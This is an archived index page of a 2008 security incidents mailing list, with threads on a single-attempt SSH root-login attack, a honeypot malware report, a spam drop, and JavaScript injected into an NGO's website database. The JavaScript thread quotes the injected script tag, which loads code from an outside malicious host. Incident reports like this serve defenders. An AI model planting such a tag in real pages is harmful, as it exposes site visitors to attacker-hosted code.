Incidents Mode:
(Page 3 of 170)  < Prev  1 2 3 4 5 6 7 8 9 10 11  Next >
Malware IRC/DNS Network Activity 2008-05-08
Matteo Cantoni (matteo cantoni nothink org)
Hi list,

with my adsl + soekris + openbsd + honeypot + perl I made a simple pages
about "Malware IRC/DNS Network Activity".

http://www.nothink.org/malware/report/hash-a.html

These pages will be update automatically every day.
You can also download a "TOTAL CSV FILE" with these informations:

md5,

[ more ]  [ reply ]
Re: Weird SSH attack last night and this morning (still ongoing) 2008-05-07
Gary Baribault (gary baribault net)
Yeah, but I'm a masochist, I run these servers for the fun of it and to
see what's happening on the net. I see all of the background static and
every now and again I see somehting fun like this!

Gary Baribault
Courriel: gary (at) baribault (dot) net [email concealed]
GPG Key: 0x4346F013
GPG Fingerprint: BCE8 2E6B EB39 9B23 6

[ more ]  [ reply ]
Re: Weird SSH attack last night and this morning (still ongoing) 2008-05-07
Gary Baribault (gary baribault net)
I haven't had any luck getting the attack code either .. it's clearly
automated and I've had many replies saying that others have been hit the
same over the last 18 hours .. it's actually a rather stupid attack,
since it only tries root and only once..

Gary Baribault
Courriel: gary (at) baribault (dot) ne [email concealed]

[ more ]  [ reply ]
Re: Weird SSH attack last night and this morning (still ongoing) 2008-05-07
Gary Baribault (gary baribault net) (1 replies)
I'm hit all the time too, but it's usually scripted, and they'll try 6 -
8 logins before my DenyHosts script bans the IP address. In this case,
there is only one login attempt, and it with root .. then that source IP
doesn't try again .. it's as if someone just got some default password
or maybe

[ more ]  [ reply ]
Re: Weird SSH attack last night and this morning (still ongoing) 2008-05-07
Bartholomew Mallio (bmallio mail rockefeller edu)
Weird SSH attack last night and this morning (still ongoing) 2008-05-07
Gary Baribault (gary baribault net) (5 replies)
I don't know what is going on last night and this morning ... I have
three Linux servers facing the Internet, two on cable modems and another
on a static IP/commercial connection and this last one is a gateway to a
Web/FTP/SMTP/Pop3/NTP Linux based system.

I have DenyHosts installed on all three

[ more ]  [ reply ]
Re: Weird SSH attack last night and this morning (still ongoing) 2008-05-07
Brent Kearney (brentk birs ca)
RE: Weird SSH attack last night and this morning (still ongoing) 2008-05-07
Erin Carroll (amoeba amoebazone com) (1 replies)
Re: Weird SSH attack last night and this morning (still ongoing) 2008-05-07
Blaine Fleming (groups digital-z com)
Re: Weird SSH attack last night and this morning (still ongoing) 2008-05-07
Robert Taylor (rjamestaylor gmail com) (1 replies)
RE: Weird SSH attack last night and this morning (still ongoing) 2008-05-07
Erin Carroll (amoeba amoebazone com) (1 replies)
Re: Weird SSH attack last night and this morning (still ongoing) 2008-05-07
Robert Taylor (rjamestaylor gmail com) (1 replies)
RE: Weird SSH attack last night and this morning (still ongoing) 2008-05-07
Erin Carroll (amoeba amoebazone com)
RE: eSafe quarantine: Re: Mysterious JavaScript appearance in website database 2008-04-15
Boaz Shunami (BoazS comsecglobal com)
Hi Glenn,

Looks like it can be any number of attack vectors.

Your infrastructures are highly vulnerable (NT and IIS 4) and may
contain lots of vulnerabilities you're not aware of. Moreover, your
custom developed CMS which is probably ASP based may have application
security vulnerabilities. Have yo

[ more ]  [ reply ]
Mysterious JavaScript appearance in website database 2008-04-14
Glenn Gillis (glenn elaw org test-google-a com) (3 replies)
On Sunday, 2008-April-13 at 01:07:38.030 UTC, the CMS database of the
U.S.-based NGO I work for mysteriously had a JavaScript URL appended to
the titles of much of the content on our website:

<script src=http://www.nihaorr1.com/1.js></script>

NB: the last modified dates for all of the content

[ more ]  [ reply ]
Re: Mysterious JavaScript appearance in website database 2008-04-15
Bojan Zdrnja (bojan zdrnja gmail com) (1 replies)
Re: Mysterious JavaScript appearance in website database 2008-04-15
Glenn Gillis (glenn elaw org test-google-a com)
Re: Mysterious JavaScript appearance in website database 2008-04-15
Bob Cunningham (bob cdsinc com)
Re: Mysterious JavaScript appearance in website database 2008-04-14
Jon Oberheide (jon oberheide org) (1 replies)
Re: Mysterious JavaScript appearance in website database 2008-04-15
Yuli Stremovsky (stremovsky gmail com)
SPAM drop? 2008-03-31
vtlists wyae de (1 replies)

Greetings!

Not that I want to complain - but I have observed a massive drop in
(unsuccessful because blocked) SPAM deliveries - only ~10% compared to only
2 weeks ago (or only 20% of the average of this year).
http://www.wyae.de/mailstats.png

Has anyone else observed this?
What might be the r

[ more ]  [ reply ]
Re: SPAM drop? 2008-03-31
Randy Wyatt (rwwyatt01 gmail com) (1 replies)
Re: SPAM drop? 2008-04-01
crazy frog crazy frog (i m crazy frog gmail com)
CanSecWest 2008 Mar 26-28 2008-02-22
Dragos Ruiu (dr kyx net)
CanSecWest 2008 Presentations

Snort 3.0 - Marty Roesch, Sourcefire

Cross-Site Scripting Vulnerabilities in Flash Authoring Tools - Rich
Cannings, Google

Proprietary RFID Systems - Jan "starbug" Krissler and Karsten Nohl, CCC

Media Frenzy: Finding Bugs in Windows Media Software - Mark Dowd and

[ more ]  [ reply ]
(Page 3 of 170)  < Prev  1 2 3 4 5 6 7 8 9 10 11  Next >


 

Privacy Statement
Copyright 2010, SecurityFocus